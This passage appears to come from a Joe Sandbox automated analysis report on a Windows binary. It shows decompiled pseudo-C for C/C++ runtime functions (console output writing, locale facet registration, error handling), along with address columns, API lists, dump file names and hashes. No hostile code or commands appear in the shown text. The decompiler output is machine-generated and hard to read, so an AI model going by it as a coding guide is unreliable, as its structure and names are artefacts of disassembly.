				signed char _v80;
				signed int _v84;
				signed int _v88;
				char _v92;
				intOrPtr _v96;
				long _v100;
				signed char* _v104;
				signed char* _v108;
				void* _v112;
				intOrPtr _v116;
				char _v120;
				int _v124;
				intOrPtr _v128;
				struct _OVERLAPPED* _v132;
				struct _OVERLAPPED* _v136;
				struct _OVERLAPPED* _v140;
				struct _OVERLAPPED* _v144;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t170;
				signed int _t172;
				int _t178;
				intOrPtr _t183;
				intOrPtr _t186;
				void* _t188;
				void* _t190;
				long _t193;
				void _t198;
				signed char* _t202;
				void* _t206;
				struct _OVERLAPPED* _t211;
				void* _t220;
				long _t224;
				intOrPtr _t225;
				char _t227;
				void* _t237;
				signed int _t242;
				intOrPtr _t245;
				signed int _t248;
				signed int _t249;
				signed int _t251;
				intOrPtr _t253;
				void* _t259;
				intOrPtr _t260;
				signed int _t261;
				signed char _t264;
				intOrPtr _t267;
				signed char* _t269;
				signed int _t272;
				signed int _t273;
				signed int _t277;
				signed int _t278;
				intOrPtr _t279;
				signed int _t280;
				struct _OVERLAPPED* _t282;
				struct _OVERLAPPED* _t284;
				signed int _t285;
				void* _t286;
				void* _t287;

				_t170 =  *0xa44bac; // 0x96877b9b
				_v8 = _t170 ^ _t285;
				_t172 = _a8;
				_t264 = _t172 >> 6;
				_t242 = (_t172 & 0x0000003f) * 0x38;
				_t269 = _a12;
				_v108 = _t269;
				_v80 = _t264;
				_v112 =  *((intOrPtr*)(_t242 +  *((intOrPtr*)(0xa46528 + _t264 * 4)) + 0x18));
				_v44 = _t242;
				_v96 = _a16 + _t269;
				_t178 = GetConsoleOutputCP();
				_t241 = 0;
				_v124 = _t178;
				E009FD21E( &_v72, _t264, 0);
				_t273 = 0;
				_v92 = 0;
				_v88 = 0;
				_v84 = 0;
				_t245 =  *((intOrPtr*)(_v68 + 8));
				_v128 = _t245;
				_v104 = _t269;
				if(_t269 >= _v96) {
					L48:
					__eflags = _v60 - _t241;
				} else {
					while(1) {
						_t248 = _v44;
						_v51 =  *_t269;
						_v76 = _t241;
						_v40 = 1;
						_t186 =  *((intOrPtr*)(0xa46528 + _v80 * 4));
						_v48 = _t186;
						if(_t245 != 0xfde9) {
							goto L19;
						}
						_t211 = _t241;
						_t267 = _v48 + 0x2e + _t248;
						_v116 = _t267;
						while( *((intOrPtr*)(_t267 + _t211)) != _t241) {
							_t211 =  &(_t211->Internal);
							if(_t211 < 5) {
								continue;
							}
							break;
						}
						_t264 = _v96 - _t269;
						_v40 = _t211;
						if(_t211 <= 0) {
							_t72 = ( *_t269 & 0x000000ff) + 0xa44e30; // 0x0
							_t253 =  *_t72 + 1;
							_v48 = _t253;
							__eflags = _t253 - _t264;
							if(_t253 > _t264) {
								__eflags = _t264;
								if(_t264 <= 0) {
									goto L40;
								} else {
									_t278 = _v44;
									do {
										 *((char*)( *((intOrPtr*)(0xa46528 + _v80 * 4)) + _t278 + _t241 + 0x2e)) =  *((intOrPtr*)(_t241 + _t269));
										_t241 =  &(_t241->Internal);
										__eflags = _t241 - _t264;
									} while (_t241 < _t264);
									goto L39;
								}
							} else {
								_v144 = _t241;
								__eflags = _t253 - 4;
								_v140 = _t241;
								_v56 = _t269;
								_v40 = (_t253 == 4) + 1;
								_t220 = E00A0F514( &_v144,  &_v76,  &_v56, (_t253 == 4) + 1,  &_v144);
								_t287 = _t286 + 0x10;
								__eflags = _t220 - 0xffffffff;
								if(_t220 == 0xffffffff) {
									goto L48;
								} else {
									_t279 = _v48;
									goto L18;
								}
							}
						} else {
							_t224 =  *((char*)(( *(_t248 + _v48 + 0x2e) & 0x000000ff) + 0xa44e30)) + 1;
							_v56 = _t224;
							_t225 = _t224 - _v40;
							_v48 = _t225;
							if(_t225 > _t264) {
								__eflags = _t264;
								if(_t264 > 0) {
									_t280 = _t248;
									do {
										_t227 =  *((intOrPtr*)(_t241 + _t269));
										_t259 =  *((intOrPtr*)(0xa46528 + _v80 * 4)) + _t280 + _t241;
										_t241 =  &(_t241->Internal);
										 *((char*)(_t259 + _v40 + 0x2e)) = _t227;
										_t280 = _v44;
										__eflags = _t241 - _t264;
									} while (_t241 < _t264);
									L39:
									_t273 = _v88;
								}
								L40:
								_t277 = _t273 + _t264;
								__eflags = _t277;
								L41:
								__eflags = _v60;
								_v88 = _t277;
							} else {
								_t264 = _v40;
								_t282 = _t241;
								_t260 = _v116;
								do {
									 *((char*)(_t285 + _t282 - 0xc)) =  *((intOrPtr*)(_t260 + _t282));
									_t282 =  &(_t282->Internal);
								} while (_t282 < _t264);
								_t283 = _v48;
								_t261 = _v44;
								if(_v48 > 0) {
									E009F9CF0( &_v16 + _t264, _t269, _t283);
									_t261 = _v44;
									_t286 = _t286 + 0xc;
									_t264 = _v40;
								}
								_t272 = _v80;
								_t284 = _t241;
								do {
									 *( *((intOrPtr*)(0xa46528 + _t272 * 4)) + _t261 + _t284 + 0x2e) = _t241;
									_t284 =  &(_t284->Internal);
								} while (_t284 < _t264);
								_t269 = _v104;
								_t279 = _v48;
								_v120 =  &_v16;
								_v136 = _t241;
								_v132 = _t241;
								_v40 = (_v56 == 4) + 1;
								_t237 = E00A0F514( &_v136,  &_v76,  &_v120, (_v56 == 4) + 1,  &_v136);
								_t287 = _t286 + 0x10;
								if(_t237 == 0xffffffff) {
									goto L48;
								} else {
									L18:
									_t269 = _t269 - 1 + _t279;
									L27:
									_t269 =  &(_t269[1]);
									_v104 = _t269;
									_t193 = E00A0B091(_v124, _t241,  &_v76, _v40,  &_v32, 5, _t241, _t241);
									_t286 = _t287 + 0x20;
									_v56 = _t193;
									if(_t193 == 0) {
										goto L48;
									} else {
										if(WriteFile(_v112,  &_v32, _t193,  &_v100, _t241) == 0) {
											L47:
											_v92 = GetLastError();
											goto L48;
										} else {
											_t273 = _v84 - _v108 + _t269;
											_v88 = _t273;
											if(_v100 < _v56) {
												goto L48;
											} else {
												if(_v51 != 0xa) {
													L34:
													if(_t269 >= _v96) {
														goto L48;
													} else {
														_t245 = _v128;
														continue;
													}
												} else {
													_t198 = 0xd;
													_v52 = _t198;
													if(WriteFile(_v112,  &_v52, 1,  &_v100, _t241) == 0) {
														goto L47;
													} else {
														if(_v100 < 1) {
															goto L48;
														} else {
															_v84 = _v84 + 1;
															_t273 = _t273 + 1;
															_v88 = _t273;
															goto L34;
														}
													}
												}
											}
										}
									}
								}
							}
						}
						goto L49;
						L19:
						_t264 =  *((intOrPtr*)(_t248 + _t186 + 0x2d));
						__eflags = _t264 & 0x00000004;
						if((_t264 & 0x00000004) == 0) {
							_v33 =  *_t269;
							_t188 = E009FE4C0(_t264);
							_t249 = _v33 & 0x000000ff;
							__eflags =  *((intOrPtr*)(_t188 + _t249 * 2)) - _t241;
							if( *((intOrPtr*)(_t188 + _t249 * 2)) >= _t241) {
								_push(1);
								_push(_t269);
								goto L26;
							} else {
								_t202 =  &(_t269[1]);
								_v56 = _t202;
								__eflags = _t202 - _v96;
								if(_t202 >= _v96) {
									_t264 = _v80;
									_t251 = _v44;
									_t241 = _v33;
									 *((char*)(_t251 +  *((intOrPtr*)(0xa46528 + _t264 * 4)) + 0x2e)) = _v33;
									 *(_t251 +  *((intOrPtr*)(0xa46528 + _t264 * 4)) + 0x2d) =  *(_t251 +  *((intOrPtr*)(0xa46528 + _t264 * 4)) + 0x2d) | 0x00000004;
									_t277 = _t273 + 1;
									goto L41;
								} else {
									_t206 = E00A04FD9( &_v76, _t269, 2);
									_t287 = _t286 + 0xc;
									__eflags = _t206 - 0xffffffff;
									if(_t206 == 0xffffffff) {
										goto L48;
									} else {
										_t269 = _v56;
										goto L27;
									}
								}
							}
						} else {
							_t264 = _t264 & 0x000000fb;
							_v24 =  *((intOrPtr*)(_t248 + _t186 + 0x2e));
							_v23 =  *_t269;
							_push(2);
							 *(_t248 + _v48 + 0x2d) = _t264;
							_push( &_v24);
							L26:
							_push( &_v76);
							_t190 = E00A04FD9();
							_t287 = _t286 + 0xc;
							__eflags = _t190 - 0xffffffff;
							if(_t190 == 0xffffffff) {
								goto L48;
							} else {
								goto L27;
							}
						}
						goto L49;
					}
				}
				L49:
				if(__eflags != 0) {
					_t183 = _v72;
					_t165 = _t183 + 0x350;
					 *_t165 =  *(_t183 + 0x350) & 0xfffffffd;
					__eflags =  *_t165;
				}
				__eflags = _v8 ^ _t285;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				return E009F8F7D(_a4, _t241, _v8 ^ _t285, _t264, _a4,  &_v92);
			}















































































                                                                                                                                                                          0x00a078a9
                                                                                                                                                                          0x00a078b0
                                                                                                                                                                          0x00a078b3
                                                                                                                                                                          0x00a078bb
                                                                                                                                                                          0x00a078be
                                                                                                                                                                          0x00a078cb
                                                                                                                                                                          0x00a078ce
                                                                                                                                                                          0x00a078d1
                                                                                                                                                                          0x00a078d8
                                                                                                                                                                          0x00a078e0
                                                                                                                                                                          0x00a078e3
                                                                                                                                                                          0x00a078e6
                                                                                                                                                                          0x00a078ec
                                                                                                                                                                          0x00a078ee
                                                                                                                                                                          0x00a078f5
                                                                                                                                                                          0x00a078ff
                                                                                                                                                                          0x00a07901
                                                                                                                                                                          0x00a07904
                                                                                                                                                                          0x00a07907
                                                                                                                                                                          0x00a0790a
                                                                                                                                                                          0x00a0790d
                                                                                                                                                                          0x00a07910
                                                                                                                                                                          0x00a07916
                                                                                                                                                                          0x00a07c21
                                                                                                                                                                          0x00a07c21
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0791c
                                                                                                                                                                          0x00a07924
                                                                                                                                                                          0x00a07927
                                                                                                                                                                          0x00a0792d
                                                                                                                                                                          0x00a07930
                                                                                                                                                                          0x00a07937
                                                                                                                                                                          0x00a0793e
                                                                                                                                                                          0x00a07941
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0794a
                                                                                                                                                                          0x00a0794f
                                                                                                                                                                          0x00a07951
                                                                                                                                                                          0x00a07954
                                                                                                                                                                          0x00a07959
                                                                                                                                                                          0x00a0795d
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0795d
                                                                                                                                                                          0x00a07962
                                                                                                                                                                          0x00a07964
                                                                                                                                                                          0x00a07969
                                                                                                                                                                          0x00a07a23
                                                                                                                                                                          0x00a07a2a
                                                                                                                                                                          0x00a07a2b
                                                                                                                                                                          0x00a07a2e
                                                                                                                                                                          0x00a07a30
                                                                                                                                                                          0x00a07bd4
                                                                                                                                                                          0x00a07bd6
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a07bd8
                                                                                                                                                                          0x00a07bd8
                                                                                                                                                                          0x00a07bdb
                                                                                                                                                                          0x00a07bea
                                                                                                                                                                          0x00a07bee
                                                                                                                                                                          0x00a07bef
                                                                                                                                                                          0x00a07bef
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a07bf3
                                                                                                                                                                          0x00a07a36
                                                                                                                                                                          0x00a07a38
                                                                                                                                                                          0x00a07a3e
                                                                                                                                                                          0x00a07a41
                                                                                                                                                                          0x00a07a4d
                                                                                                                                                                          0x00a07a56
                                                                                                                                                                          0x00a07a61
                                                                                                                                                                          0x00a07a66
                                                                                                                                                                          0x00a07a69
                                                                                                                                                                          0x00a07a6c
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a07a72
                                                                                                                                                                          0x00a07a72
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a07a72
                                                                                                                                                                          0x00a07a6c
                                                                                                                                                                          0x00a0796f
                                                                                                                                                                          0x00a0797e
                                                                                                                                                                          0x00a0797f
                                                                                                                                                                          0x00a07982
                                                                                                                                                                          0x00a07985
                                                                                                                                                                          0x00a0798a
                                                                                                                                                                          0x00a07ba0
                                                                                                                                                                          0x00a07ba2
                                                                                                                                                                          0x00a07ba4
                                                                                                                                                                          0x00a07ba6
                                                                                                                                                                          0x00a07bb0
                                                                                                                                                                          0x00a07bb8
                                                                                                                                                                          0x00a07bba
                                                                                                                                                                          0x00a07bbb
                                                                                                                                                                          0x00a07bbf
                                                                                                                                                                          0x00a07bc2
                                                                                                                                                                          0x00a07bc2
                                                                                                                                                                          0x00a07bc6
                                                                                                                                                                          0x00a07bc6
                                                                                                                                                                          0x00a07bc6
                                                                                                                                                                          0x00a07bc9
                                                                                                                                                                          0x00a07bc9
                                                                                                                                                                          0x00a07bc9
                                                                                                                                                                          0x00a07bcb
                                                                                                                                                                          0x00a07bcb
                                                                                                                                                                          0x00a07bcf
                                                                                                                                                                          0x00a07990
                                                                                                                                                                          0x00a07990
                                                                                                                                                                          0x00a07993
                                                                                                                                                                          0x00a07995
                                                                                                                                                                          0x00a07998
                                                                                                                                                                          0x00a0799b
                                                                                                                                                                          0x00a0799f
                                                                                                                                                                          0x00a079a0
                                                                                                                                                                          0x00a079a4
                                                                                                                                                                          0x00a079a7
                                                                                                                                                                          0x00a079ac
                                                                                                                                                                          0x00a079b6
                                                                                                                                                                          0x00a079bb
                                                                                                                                                                          0x00a079be
                                                                                                                                                                          0x00a079c1
                                                                                                                                                                          0x00a079c1
                                                                                                                                                                          0x00a079c4
                                                                                                                                                                          0x00a079c7
                                                                                                                                                                          0x00a079c9
                                                                                                                                                                          0x00a079d2
                                                                                                                                                                          0x00a079d6
                                                                                                                                                                          0x00a079d7
                                                                                                                                                                          0x00a079db
                                                                                                                                                                          0x00a079e1
                                                                                                                                                                          0x00a079ea
                                                                                                                                                                          0x00a079f7
                                                                                                                                                                          0x00a079fe
                                                                                                                                                                          0x00a07a02
                                                                                                                                                                          0x00a07a0d
                                                                                                                                                                          0x00a07a12
                                                                                                                                                                          0x00a07a18
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a07a1e
                                                                                                                                                                          0x00a07a75
                                                                                                                                                                          0x00a07a76
                                                                                                                                                                          0x00a07af9
                                                                                                                                                                          0x00a07b00
                                                                                                                                                                          0x00a07b08
                                                                                                                                                                          0x00a07b10
                                                                                                                                                                          0x00a07b15
                                                                                                                                                                          0x00a07b18
                                                                                                                                                                          0x00a07b1d
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a07b23
                                                                                                                                                                          0x00a07b38
                                                                                                                                                                          0x00a07c18
                                                                                                                                                                          0x00a07c1e
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a07b3e
                                                                                                                                                                          0x00a07b47
                                                                                                                                                                          0x00a07b49
                                                                                                                                                                          0x00a07b4f
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a07b55
                                                                                                                                                                          0x00a07b59
                                                                                                                                                                          0x00a07b8f
                                                                                                                                                                          0x00a07b92
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a07b98
                                                                                                                                                                          0x00a07b98
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a07b98
                                                                                                                                                                          0x00a07b5b
                                                                                                                                                                          0x00a07b5d
                                                                                                                                                                          0x00a07b5f
                                                                                                                                                                          0x00a07b78
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a07b7e
                                                                                                                                                                          0x00a07b82
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a07b88
                                                                                                                                                                          0x00a07b88
                                                                                                                                                                          0x00a07b8b
                                                                                                                                                                          0x00a07b8c
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a07b8c
                                                                                                                                                                          0x00a07b82
                                                                                                                                                                          0x00a07b78
                                                                                                                                                                          0x00a07b59
                                                                                                                                                                          0x00a07b4f
                                                                                                                                                                          0x00a07b38
                                                                                                                                                                          0x00a07b1d
                                                                                                                                                                          0x00a07a18
                                                                                                                                                                          0x00a0798a
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a07a7a
                                                                                                                                                                          0x00a07a7a
                                                                                                                                                                          0x00a07a7e
                                                                                                                                                                          0x00a07a81
                                                                                                                                                                          0x00a07aa3
                                                                                                                                                                          0x00a07aa6
                                                                                                                                                                          0x00a07aab
                                                                                                                                                                          0x00a07aaf
                                                                                                                                                                          0x00a07ab3
                                                                                                                                                                          0x00a07ae1
                                                                                                                                                                          0x00a07ae3
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a07ab5
                                                                                                                                                                          0x00a07ab5
                                                                                                                                                                          0x00a07ab8
                                                                                                                                                                          0x00a07abb
                                                                                                                                                                          0x00a07abe
                                                                                                                                                                          0x00a07bf5
                                                                                                                                                                          0x00a07bf8
                                                                                                                                                                          0x00a07bfb
                                                                                                                                                                          0x00a07c05
                                                                                                                                                                          0x00a07c10
                                                                                                                                                                          0x00a07c15
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a07ac4
                                                                                                                                                                          0x00a07acb
                                                                                                                                                                          0x00a07ad0
                                                                                                                                                                          0x00a07ad3
                                                                                                                                                                          0x00a07ad6
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a07adc
                                                                                                                                                                          0x00a07adc
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a07adc
                                                                                                                                                                          0x00a07ad6
                                                                                                                                                                          0x00a07abe
                                                                                                                                                                          0x00a07a83
                                                                                                                                                                          0x00a07a87
                                                                                                                                                                          0x00a07a8a
                                                                                                                                                                          0x00a07a8f
                                                                                                                                                                          0x00a07a95
                                                                                                                                                                          0x00a07a97
                                                                                                                                                                          0x00a07a9e
                                                                                                                                                                          0x00a07ae4
                                                                                                                                                                          0x00a07ae7
                                                                                                                                                                          0x00a07ae8
                                                                                                                                                                          0x00a07aed
                                                                                                                                                                          0x00a07af0
                                                                                                                                                                          0x00a07af3
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a07af3
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a07a81
                                                                                                                                                                          0x00a0791c
                                                                                                                                                                          0x00a07c24
                                                                                                                                                                          0x00a07c24
                                                                                                                                                                          0x00a07c26
                                                                                                                                                                          0x00a07c29
                                                                                                                                                                          0x00a07c29
                                                                                                                                                                          0x00a07c29
                                                                                                                                                                          0x00a07c29
                                                                                                                                                                          0x00a07c3b
                                                                                                                                                                          0x00a07c3d
                                                                                                                                                                          0x00a07c3e
                                                                                                                                                                          0x00a07c3f
                                                                                                                                                                          0x00a07c49

                                                                                                                                                                          APIs
                                                                                                                                                                          • GetConsoleOutputCP.KERNEL32(?,00000000,?), ref: 00A078E6
                                                                                                                                                                          • __fassign.LIBCMT ref: 00A07ACB
                                                                                                                                                                          • __fassign.LIBCMT ref: 00A07AE8
                                                                                                                                                                          • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00A07B30
                                                                                                                                                                          • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00A07B70
                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00A07C18
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.312867160.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.312856202.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312888799.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312904957.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312912092.0000000000A23000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312935306.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FileWrite__fassign$ConsoleErrorLastOutput
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1735259414-0
                                                                                                                                                                          • Opcode ID: 71a11428e2de763b791cf044f31ab723384c72249befe33049e43397c264fd02
                                                                                                                                                                          • Instruction ID: 0549ccaf296e5d1618b2a8f331a5d7e1f95fd86137e71f76a8de2ff06b74986b
                                                                                                                                                                          • Opcode Fuzzy Hash: 71a11428e2de763b791cf044f31ab723384c72249befe33049e43397c264fd02
                                                                                                                                                                          • Instruction Fuzzy Hash: 87C1AC75D0425C9FDF10CFE8E8809EDBBB5AF49314F28416AE855BB281D631AE06CF60
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 009F15C0 Relevance: 9.1, APIs: 6, Instructions: 101COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 87%
                                                                                                                                                                          			E009F15C0(intOrPtr _a4) {
				char _v52;
				char _v56;
				char _v60;
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed int _t36;
				void* _t40;
				signed int _t45;
				signed int _t46;
				signed char _t47;
				signed int _t50;
				signed int _t54;
				signed int _t60;
				intOrPtr* _t61;
				signed int _t62;
				intOrPtr _t64;
				void* _t69;

				_t47 = 0;
				_v56 = 0;
				E009F6A1B( &_v56, 0);
				_t60 =  *0xa45aa0; // 0x2
				_t64 =  *0xa45aac; // 0xb80ad0
				if(_t60 == 0) {
					E009F6A1B( &_v60, _t60);
					_t69 =  *0xa45aa0 - _t47; // 0x2
					if(_t69 == 0) {
						_t45 =  *0xa45b80; // 0x3
						_t46 = _t45 + 1;
						 *0xa45b80 = _t46;
						 *0xa45aa0 = _t46;
					}
					E009F6A73( &_v60);
					_t60 =  *0xa45aa0; // 0x2
				}
				_t50 =  *(_a4 + 4);
				if(_t60 >=  *((intOrPtr*)(_t50 + 0xc))) {
					_t61 = 0;
					__eflags = 0;
					goto L8;
				} else {
					_t61 =  *((intOrPtr*)( *((intOrPtr*)(_t50 + 8)) + _t60 * 4));
					if(_t61 != 0) {
						L24:
						E009F6A73( &_v56);
						return _t61;
					} else {
						L8:
						if( *((intOrPtr*)(_t50 + 0x14)) == _t47) {
							L11:
							if(_t61 != 0) {
								goto L24;
							} else {
								goto L12;
							}
						} else {
							_t40 = E009F6D92();
							if(_t60 >=  *((intOrPtr*)(_t40 + 0xc))) {
								L12:
								if(_t64 == 0) {
									_push(8);
									_t62 = E009F89CD(__eflags);
									__eflags = _t62;
									if(_t62 == 0) {
										_t61 = 0;
										__eflags = 0;
									} else {
										_t54 =  *(_a4 + 4);
										__eflags = _t54;
										if(_t54 == 0) {
											_t36 = 0xa1424c;
										} else {
											_t36 =  *(_t54 + 0x18);
											__eflags = _t36;
											if(_t36 == 0) {
												_t36 = _t54 + 0x1c;
											}
										}
										_push(_t36);
										E009F19A0(_t47,  &_v52);
										 *(_t62 + 4) = _t47;
										_t47 = 1;
										 *_t62 = 0xa14ac0;
									}
									__eflags = _t47 & 0x00000001;
									if(__eflags != 0) {
										E009F2E10( &_v52, _t61);
									}
									E009F6D66(__eflags, _t61);
									 *((intOrPtr*)( *_t61 + 4))();
									 *0xa45aac = _t61;
									goto L24;
								} else {
									E009F6A73( &_v56);
									return _t64;
								}
							} else {
								_t61 =  *((intOrPtr*)( *((intOrPtr*)(_t40 + 8)) + _t60 * 4));
								goto L11;
							}
						}
					}
				}
			}





















                                                                                                                                                                          0x009f15c7
                                                                                                                                                                          0x009f15ce
                                                                                                                                                                          0x009f15d2
                                                                                                                                                                          0x009f15d7
                                                                                                                                                                          0x009f15dd
                                                                                                                                                                          0x009f15e5
                                                                                                                                                                          0x009f15ec
                                                                                                                                                                          0x009f15f1
                                                                                                                                                                          0x009f15f7
                                                                                                                                                                          0x009f15f9
                                                                                                                                                                          0x009f15fe
                                                                                                                                                                          0x009f15ff
                                                                                                                                                                          0x009f1604
                                                                                                                                                                          0x009f1604
                                                                                                                                                                          0x009f160d
                                                                                                                                                                          0x009f1612
                                                                                                                                                                          0x009f1612
                                                                                                                                                                          0x009f161c
                                                                                                                                                                          0x009f1622
                                                                                                                                                                          0x009f1634
                                                                                                                                                                          0x009f1634
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009f1624
                                                                                                                                                                          0x009f1627
                                                                                                                                                                          0x009f162c
                                                                                                                                                                          0x009f16d8
                                                                                                                                                                          0x009f16dc
                                                                                                                                                                          0x009f16ea
                                                                                                                                                                          0x009f1632
                                                                                                                                                                          0x009f1636
                                                                                                                                                                          0x009f1639
                                                                                                                                                                          0x009f164b
                                                                                                                                                                          0x009f164d
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009f163b
                                                                                                                                                                          0x009f163b
                                                                                                                                                                          0x009f1643
                                                                                                                                                                          0x009f1653
                                                                                                                                                                          0x009f1655
                                                                                                                                                                          0x009f166c
                                                                                                                                                                          0x009f1673
                                                                                                                                                                          0x009f1678
                                                                                                                                                                          0x009f167a
                                                                                                                                                                          0x009f16b2
                                                                                                                                                                          0x009f16b2
                                                                                                                                                                          0x009f167c
                                                                                                                                                                          0x009f1680
                                                                                                                                                                          0x009f1683
                                                                                                                                                                          0x009f1685
                                                                                                                                                                          0x009f1693
                                                                                                                                                                          0x009f1687
                                                                                                                                                                          0x009f1687
                                                                                                                                                                          0x009f168a
                                                                                                                                                                          0x009f168c
                                                                                                                                                                          0x009f168e
                                                                                                                                                                          0x009f168e
                                                                                                                                                                          0x009f168c
                                                                                                                                                                          0x009f1698
                                                                                                                                                                          0x009f169d
                                                                                                                                                                          0x009f16a2
                                                                                                                                                                          0x009f16a5
                                                                                                                                                                          0x009f16aa
                                                                                                                                                                          0x009f16aa
                                                                                                                                                                          0x009f16b4
                                                                                                                                                                          0x009f16b7
                                                                                                                                                                          0x009f16bd
                                                                                                                                                                          0x009f16bd
                                                                                                                                                                          0x009f16c3
                                                                                                                                                                          0x009f16cf
                                                                                                                                                                          0x009f16d2
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009f1657
                                                                                                                                                                          0x009f165d
                                                                                                                                                                          0x009f166b
                                                                                                                                                                          0x009f166b
                                                                                                                                                                          0x009f1645
                                                                                                                                                                          0x009f1648
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009f1648
                                                                                                                                                                          0x009f1643
                                                                                                                                                                          0x009f1639
                                                                                                                                                                          0x009f162c

                                                                                                                                                                          APIs
                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 009F15D2
                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 009F15EC
                                                                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 009F160D
                                                                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 009F165D
                                                                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 009F16C3
                                                                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 009F16DC
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.312867160.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.312856202.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312888799.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312904957.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312912092.0000000000A23000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312935306.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: std::_$Lockit$Lockit::~_$Lockit::_$Facet_Register
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1858714459-0
                                                                                                                                                                          • Opcode ID: e82b8a5fc2305b1f4638e4b37f8af5c239f8f37b7edec7aa0ff0e1d8c64775e9
                                                                                                                                                                          • Instruction ID: 2b5c972ab6ad6f4281faf69843fcec3a05048a7c25e8b0e4921f242d61a59e48
                                                                                                                                                                          • Opcode Fuzzy Hash: e82b8a5fc2305b1f4638e4b37f8af5c239f8f37b7edec7aa0ff0e1d8c64775e9
                                                                                                                                                                          • Instruction Fuzzy Hash: 8C310239A00618CFC310DF54D880A7AB7A8FFD0750B59452DEA4697352DB72ED46CBC2
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 009FB6EA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 85%
                                                                                                                                                                          			E009FB6EA(void* __ecx) {
				void* _t4;
				void* _t8;
				void* _t11;
				void* _t13;
				void* _t14;
				void* _t18;
				void* _t23;
				long _t24;
				void* _t27;

				_t13 = __ecx;
				if( *0xa44bd0 != 0xffffffff) {
					_t24 = GetLastError();
					_t11 = E009FC8DB(_t13, __eflags,  *0xa44bd0);
					_t14 = _t23;
					__eflags = _t11 - 0xffffffff;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						__eflags = _t11;
						if(__eflags == 0) {
